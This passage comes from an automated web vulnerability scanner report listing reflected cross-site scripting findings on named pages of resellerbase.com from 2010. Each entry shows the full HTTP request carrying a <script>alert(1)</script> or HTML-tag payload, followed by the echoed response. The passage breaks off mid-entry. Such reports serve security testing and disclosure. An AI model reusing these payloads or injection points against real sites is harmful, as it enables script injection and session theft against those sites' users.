Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/search.phpb1eaf<script>alert(1)</script>57028d27d5f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3953. http://www.resellerbase.com/other/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/other/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8bfe3<a>4f60ab2e166 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /other/search.php?keyword=search...&Submit3=Search8bfe3<a>4f60ab2e166&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/search.php?keyword=search...&Submit3=Search8bfe3<a>4f60ab2e166&opt=2 was not found on this server.</p>
...[SNIP]...

2.3954. http://www.resellerbase.com/other/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/other/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5601b<a>7d31404df7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /other/search.php?keyword=search...5601b<a>7d31404df7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/search.php?keyword=search...5601b<a>7d31404df7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3955. http://www.resellerbase.com/other/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/other/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5f2eb<script>alert(1)</script>c386089d99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /other/search.php?keyword=search...&Submit3=Search&opt=2&5f2eb<script>alert(1)</script>c386089d99d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/search.php?keyword=search...&Submit3=Search&opt=2&5f2eb<script>alert(1)</script>c386089d99d=1 was not found on this server.</p>
...[SNIP]...

2.3956. http://www.resellerbase.com/other/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/other/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 36cbc<a>b5acf97596b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /other/search.php?keyword=search...&Submit3=Search&opt=236cbc<a>b5acf97596b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/search.php?keyword=search...&Submit3=Search&opt=236cbc<a>b5acf97596b was not found on this server.</p>
...[SNIP]...

2.3957. http://www.resellerbase.com/pick.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/pick.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2829b<script>alert(1)</script>2bf52814a73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pick.php2829b<script>alert(1)</script>2bf52814a73 HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /pick.php2829b<script>alert(1)</script>2bf52814a73 was not found on this server.</p>
...[SNIP]...

2.3958. http://www.resellerbase.com/power_search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/power_search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dbb11<script>alert(1)</script>c343095c208 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /power_search.phpdbb11<script>alert(1)</script>c343095c208 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /power_search.phpdbb11<script>alert(1)</script>c343095c208 was not found on this server.</p>
...[SNIP]...

2.3959. http://www.resellerbase.com/power_search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/power_search.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdaa5"><script>alert(1)</script>cc97264412c994d9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /power_search.phpbdaa5"><script>alert(1)</script>cc97264412c994d9e?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/power_search.php?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:02:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/power_search.phpbdaa5"><script>alert(1)</script>cc97264412c994d9e?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com&so
...[SNIP]...

2.3960. http://www.resellerbase.com/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b340<script>alert(1)</script>da0096006a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rating.php3b340<script>alert(1)</script>da0096006a1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:13:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /rating.php3b340<script>alert(1)</script>da0096006a1 was not found on this server.</p>
...[SNIP]...

2.3961. http://www.resellerbase.com/register.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/register.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf301<script>alert(1)</script>1321ca1ab3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.phpbf301<script>alert(1)</script>1321ca1ab3f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /register.phpbf301<script>alert(1)</script>1321ca1ab3f was not found on this server.</p>
...[SNIP]...

2.3962. http://www.resellerbase.com/resources-information/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e6dc<script>alert(1)</script>1170c37eb27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information7e6dc<script>alert(1)</script>1170c37eb27/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information7e6dc<script>alert(1)</script>1170c37eb27/ was not found on this server.</p>
...[SNIP]...

2.3963. http://www.resellerbase.com/resources-information/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 44bda<script>alert(1)</script>27e20d4c9be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/?44bda<script>alert(1)</script>27e20d4c9be=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/?44bda<script>alert(1)</script>27e20d4c9be=1 was not found on this server.</p>
...[SNIP]...

2.3964. http://www.resellerbase.com/resources-information/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload a20ca<a>06ee3588317 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fa20ca<a>06ee3588317 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fa20ca<a>06ee3588317 was not found on this server.</p>
...[SNIP]...

2.3965. http://www.resellerbase.com/resources-information/ebooks/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e048<script>alert(1)</script>d9ab180d61a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information9e048<script>alert(1)</script>d9ab180d61a/ebooks/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information9e048<script>alert(1)</script>d9ab180d61a/ebooks/ was not found on this server.</p>
...[SNIP]...

2.3966. http://www.resellerbase.com/resources-information/ebooks/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cd1a<script>alert(1)</script>4c930e7cd40300a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /resources-information7cd1a<script>alert(1)</script>4c930e7cd40300a4e/ebooks/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information7cd1a<script>alert(1)</script>4c930e7cd40300a4e/ebooks/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.3967. http://www.resellerbase.com/resources-information/ebooks/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63a65<script>alert(1)</script>10dc62652b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks63a65<script>alert(1)</script>10dc62652b7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks63a65<script>alert(1)</script>10dc62652b7/ was not found on this server.</p>
...[SNIP]...

2.3968. http://www.resellerbase.com/resources-information/ebooks/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc815<script>alert(1)</script>014d53e4fa3723b0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /resources-information/ebooksfc815<script>alert(1)</script>014d53e4fa3723b0c/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksfc815<script>alert(1)</script>014d53e4fa3723b0c/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.3969. http://www.resellerbase.com/resources-information/ebooks/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ec7f8<script>alert(1)</script>a4648cd2e5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/?ec7f8<script>alert(1)</script>a4648cd2e5c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/?ec7f8<script>alert(1)</script>a4648cd2e5c=1 was not found on this server.</p>
...[SNIP]...

2.3970. http://www.resellerbase.com/resources-information/ebooks/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload d3cb8<a>de5f2d7e1eb was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fd3cb8<a>de5f2d7e1eb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fd3cb8<a>de5f2d7e1eb was not found on this server.</p>
...[SNIP]...

2.3971. http://www.resellerbase.com/resources-information/ebooks/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/googlepr.php

Issue detail

